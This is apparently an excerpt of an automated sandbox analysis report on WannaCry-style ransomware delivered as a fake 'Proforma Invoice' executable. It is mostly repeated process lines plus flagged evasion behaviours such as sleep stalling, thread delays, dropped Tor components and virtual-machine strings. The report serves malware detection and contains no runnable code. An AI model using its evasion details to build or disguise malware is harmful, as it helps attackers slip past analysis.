            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Contains functionality to detect sleep reduction / modifications
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 10_2_1000479010_2_10004790
            Found stalling execution ending in API Sleep call
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeStalling execution: Execution stalls by calling Sleepgraph_10-2207
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CED6BA0 RAND_poll,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetVersion,GetVersion,OPENSSL_isservice,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,RAND_add,FreeLibrary,GetTickCount,RAND_add,GlobalMemoryStatus,RAND_add,GetCurrentProcessId,RAND_add,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RAND_add,GetVersion,GetVersion,GetVersion,RAND_add,FreeLibrary,QueryPerformanceCounter,RAND_add,RAND_add,RAND_add,RAND_add,RAND_add,RAND_add,Heap32First,RAND_add,Heap32Next,Heap32ListNext,GetTickCount,GetTickCount,GetTickCount,Process32First,GetTickCount,GetTickCount,GetTickCount,GetTickCount,RAND_add,RAND_add,RAND_add,GetTickCount,RAND_add,GetTickCount,RAND_add,GetTickCount,GetTickCount,RAND_add,GetTickCount,GetTickCount,GetTickCount,Heap32ListFirst,FindCloseChangeNotification,__stack_chk_fail,RAND_event,GetTickCount,RAND_add,RAND_add,RAND_add,RAND_add,RAND_status,QueryPerformanceCounter,RAND_add,__stack_chk_fail,RAND_screen,RAND_poll,GetVersion,OPENSSL_isservice,GetDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,GetObjectA,CRYPTO_malloc,GetDIBits,EVP_sha1,EVP_Digest,RAND_add,CRYPTO_free,DeleteObject,ReleaseDC,__stack_chk_fail,__stack_chk_fail,__stack_chk_fail,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,CRYPTO_lock,lh_free,CRYPTO_lock,__stack_chk_fail,CRYPTO_add_lock,__stack_chk_fail,CRYPTO_lock,CRYPTO_lock,CRYPTO_push_info_,lh_new,CRYPTO_pop_info,__stack_chk_fail,CRYPTO_lock,CRYPTO_lock,CRYPTO_push_info_,lh_new,CRYPTO_pop_info,__stack_chk_fail,__stack_chk_fail,CRYPTO_THREADID_hash,__stack_chk_fail,CRYPTO_THREADID_current,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,CRYPTO_lock,lh_retrieve,CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,CRYPTO_lock,lh_insert,CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,CRYPTO_lock,lh_delete,CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,CRYPTO_lock,lh_retrieve,CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,CRYPTO_lock,lh_insert,CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,CRYPTO_lock,lh_delete,CRYPTO_lock,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,lh_num_items,lh_free,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,86_2_6CED6BA0
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeWindow / User API: threadDelayed 807Jump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeWindow / User API: threadDelayed 1125Jump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeWindow / User API: threadDelayed 4497Jump to behavior
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeDropped PE file which has not been started: C:\Users\user\Desktop\TaskData\Tor\libevent_extra-2-0-5.dllJump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeDropped PE file which has not been started: C:\Users\user\Desktop\taskse.exeJump to dropped file
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeDropped PE file which has not been started: C:\Users\user\Desktop\TaskData\Tor\libevent_core-2-0-5.dllJump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeEvaded block: after key decisiongraph_10-1597
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeAPI coverage: 0.3 %
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe TID: 6216Thread sleep count: 67 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe TID: 6216Thread sleep time: -67000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe TID: 6148Thread sleep time: -50000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe TID: 6160Thread sleep count: 137 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe TID: 6160Thread sleep time: -411000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe TID: 964Thread sleep time: -840000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe TID: 6996Thread sleep time: -630000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe TID: 5980Thread sleep count: 807 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe TID: 5980Thread sleep time: -190000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe TID: 6216Thread sleep count: 1125 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe TID: 6216Thread sleep time: -1125000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe TID: 6160Thread sleep count: 4497 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe TID: 6160Thread sleep time: -13491000s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\taskdl.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\taskdl.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\taskdl.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\taskdl.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\taskdl.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\taskdl.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\taskdl.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\taskdl.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\taskdl.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\taskdl.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\taskdl.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\taskdl.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\taskdl.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\taskdl.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\taskdl.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\taskdl.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\taskdl.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\taskdl.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\taskdl.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\taskdl.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\taskdl.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\taskdl.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\taskdl.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\taskdl.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\taskdl.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\taskdl.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\taskdl.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\taskdl.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\taskdl.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\taskdl.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\taskdl.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\taskdl.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\taskdl.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\taskdl.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 10_2_10002300 CloseHandle,SHGetFolderPathW,??2@YAPAXI@Z,??_U@YAPAXI@Z,swprintf,FindFirstFileW,??3@YAXPAX@Z,??3@YAXPAX@Z,wcscmp,wcscmp,wcscmp,swprintf,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcscmp,wcscmp,wcscmp,wcsncpy,wcsncpy,wcsncpy,FindNextFileW,FindClose,_wcsnicmp,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,10_2_10002300
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 10_2_10004A40 CloseHandle,SHGetFolderPathW,wcslen,SHGetFolderPathW,SHGetFolderPathW,wcslen,wcsrchr,wcschr,SHGetFolderPathW,wcslen,wcsrchr,swprintf,FindFirstFileW,wcscmp,wcscmp,swprintf,wcscmp,swprintf,FindNextFileW,FindClose,10_2_10004A40
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeThread delayed: delay time: 30000Jump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeThread delayed: delay time: 30000Jump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\~SDAA18.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\~SDAA17.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Adobe\~SDAA16.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\~SD34E5.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\~SDAA19.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\~SDAA1A.tmpJump to behavior
            Source: cscript.exe, 00000014.00000003.2294086320.0000000002C7C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}k
            Source: taskhsvc.exe, 00000056.00000003.2498844045.0000000004401000.00000004.00000020.00020000.00000000.sdmp, cached-microdesc-consensus.tmp.86.drBinary or memory string: m UmVW9JP3JpLzwoz36YtcTnDnWTf7ggvQEMuK44kS0i0
